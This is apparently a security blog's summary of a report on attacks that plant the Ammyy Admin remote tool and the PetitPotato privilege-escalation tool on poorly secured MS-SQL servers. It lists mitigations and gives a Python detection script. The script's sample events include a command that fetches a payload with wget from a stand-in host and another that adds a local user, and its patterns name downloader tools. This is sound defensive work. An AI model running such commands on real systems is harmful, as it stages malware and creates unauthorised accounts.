Threat Overview
A recent threat report published by AlienVault on April 22, 2025, highlights a series of attacks targeting poorly managed Microsoft SQL (MS-SQL) servers. These attacks involve the installation of Ammyy Admin, a remote control tool, which allows attackers to gain unauthorized access and control over affected systems. This report provides an in-depth analysis of the threat, the tactics, techniques, and procedures (TTPs) employed by the attackers, and recommendations for mitigating such threats.
Threat Details
The attacks identified in this report exploit vulnerabilities in MS-SQL servers that are not properly managed or secured. The primary objective of these attacks is to install Ammyy Admin, a legitimate remote administration tool that has been repurposed for malicious activities. Once installed, the attackers can execute commands to gather system information and use tools like wget to download additional malware.
The malware components identified in this campaign include:
1. Ammyy Admin (mscorsvw.exe) – An old version (v3.10) of the remote control tool.
2. Settings file (settings3.bin) – Configuration settings for Ammyy Admin.
3. PetitPotato (p.ax) – A privilege escalation tool used to gain higher-level access on the compromised system.
The attackers utilize known exploitation methods to install these components and gain remote control over the affected servers. They also employ PetitPotato for privilege escalation, adding new users and activating Remote Desktop Protocol (RDP) services to maintain persistent access.
Attacker Group
While the report does not provide a detailed description of the actor group responsible for these attacks, it is evident that they possess advanced knowledge of MS-SQL vulnerabilities and remote administration tools. Their TTPs suggest a high level of sophistication and familiarity with exploiting poorly managed servers.
Impact and Consequences
The installation of Ammyy Admin on compromised MS-SQL servers can have severe consequences, including unauthorized access to sensitive data, data exfiltration, and further compromise of the network. The use of PetitPotato for privilege escalation allows attackers to gain administrative-level access, making it easier to move laterally within the network and deploy additional malware.
Mitigation Recommendations
To prevent such attacks, administrators are advised to implement the following security measures:
- Use Strong Passwords: Ensure that all MS-SQL server accounts use strong, unique passwords that are regularly updated.
- Regular Software Updates: Keep all software, including MS-SQL servers and remote administration tools, up to date with the latest security patches.
- Implement Firewalls: Deploy firewalls to monitor and control incoming and outgoing network traffic based on predetermined security rules.
- Network Segmentation: Segment the network to limit the spread of malware and restrict access to sensitive data.
- Intrusion Detection Systems (IDS): Use IDS to detect and respond to suspicious activities in real time.
- Regular Security Audits: Conduct regular security audits to identify and address vulnerabilities in MS-SQL servers and other critical systems.
By following these recommendations, organizations can significantly reduce the risk of falling victim to such attacks and enhance their overall cybersecurity posture.
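As an added defensive illustration (not code from the report, AhnLab or ESSGroup), the following Python checks constructed process-creation events for the behaviours described above: sqlservr.exe spawning a shell that runs wget, mscorsvw.exe executing outside the .NET Framework directory where the genuine .NET Runtime Optimization Service binary lives, a local account being added, and the dropped file names listed in the report. The sample events, paths and the example.invalid host are assumptions made for the demonstration.

```python
import re

# Constructed sample process-creation events (simplified Sysmon Event ID 1 fields).
# They are illustrative only, not data taken from the AhnLab/AlienVault report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c wget http://example.invalid/p.ax -O C:\Windows\Temp\p.ax"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\mscorsvw.exe",
     "cmdline": r"C:\Windows\Temp\mscorsvw.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user svc_backup P@ss /add"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe",
     "cmdline": "mscorsvw.exe"},  # the legitimate .NET Runtime Optimization Service
]

# Only location where the genuine mscorsvw.exe should run from.
LEGIT_MSCORSVW = re.compile(
    r"^c:\\windows\\microsoft\.net\\framework(64)?\\v[\d.]+\\mscorsvw\.exe$")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
DOWNLOADERS = re.compile(r"\b(wget|curl|certutil|bitsadmin)\b")
DROPPED_NAMES = ("settings3.bin", "p.ax")  # file names reported in the campaign

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def check_event(ev):
    """Return the names of every detection rule the event matches."""
    parent, image, cmd = basename(ev["parent"]), ev["image"].lower(), ev["cmdline"].lower()
    hits = []
    if parent == "sqlservr.exe" and basename(image) in SHELLS:
        hits.append("sqlservr_spawned_shell")       # command execution from MS-SQL
    if parent == "sqlservr.exe" and DOWNLOADERS.search(cmd):
        hits.append("download_tool_from_sqlservr")  # wget-style staging of a payload
    if basename(image) == "mscorsvw.exe" and not LEGIT_MSCORSVW.match(image):
        hits.append("mscorsvw_outside_dotnet_dir")  # Ammyy Admin masquerading by name
    if basename(image) == "net.exe" and re.search(r"\buser\b.*\s/add\b", cmd):
        hits.append("local_user_added")             # persistence via a new account
    if any(name in cmd for name in DROPPED_NAMES):
        hits.append("known_dropped_filename")
    return hits

def detect(events):
    """Map event index -> matched rule names, omitting events with no hits."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}
```

Treat the file-name rules as low-confidence hints and the sqlservr.exe-to-shell rule as the primary signal; the latter only fires where xp_cmdshell or a similar feature is enabled, which is itself worth alerting on.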
Conclusion
The threat report published by AlienVault underscores the importance of proactive security measures in protecting MS-SQL servers from malicious attacks. By understanding the TTPs employed by attackers and implementing robust security controls, organizations can effectively mitigate the risks associated with these threats and safeguard their critical assets.
For additional information on this threat, please refer to the following external references:
– https://asec.ahnlab.com/en/87606
– https://otx.alienvault.com/pulse/6807c69906b162a197133ee9